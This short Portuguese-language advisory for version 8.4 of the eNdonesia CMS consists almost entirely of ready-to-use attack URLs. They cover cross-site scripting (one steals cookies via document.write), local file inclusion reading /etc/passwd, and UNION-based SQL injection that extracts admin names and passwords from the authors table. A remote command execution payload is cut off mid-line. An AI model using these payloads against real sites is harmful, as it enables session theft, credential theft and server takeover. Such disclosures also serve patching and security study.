|
Nome do Script: eNdonesia
Site do script: http://www.endonesia.org/
Versão Afetada: 8.4
Encontrado por z1ckX
Email: map-master [at] mail.ru
Exploração:
XSS
http://localhost/en/mod.php?mod=[XSS]&op=viewlink&cid=5
http://localhost/en/friend.php your Friend:[XSS]
http://localhost/en/admin.php Main Text: [XSS]
http://localhost/en/mod.php?mod=informasi&op=showinfo&intypeid=>document.write(document.cookie)
Inclusão de Arquivos Locais
http://localhost/en/mod.php?mod=../../../../../etc/passwd%00
Injeção de Códigos SQL
http://localhost/en/mod.php?mod=diskusi&op=viewdisk&did=-4%20union%20select%200,0,name,0,pwd,0,0%20from%20authors/*
http://localhost/en/mod.php?mod=katalog&op=viewlink&cid=-2%20union%20select%200,pwd,0%20from%20authors%20where%20counter=1/*
http://localhost/en/mod.php?mod=diskusi&op=viewcat&cid=-2%20union%20select%200,0,0/*
Execução de
Comandos Remotos
http://localhost/en/mod.php?mod=diskusi&op=viewdisk&did=-4%20union%20select%200,0,'',0,0,0,0%20from%20authors into
|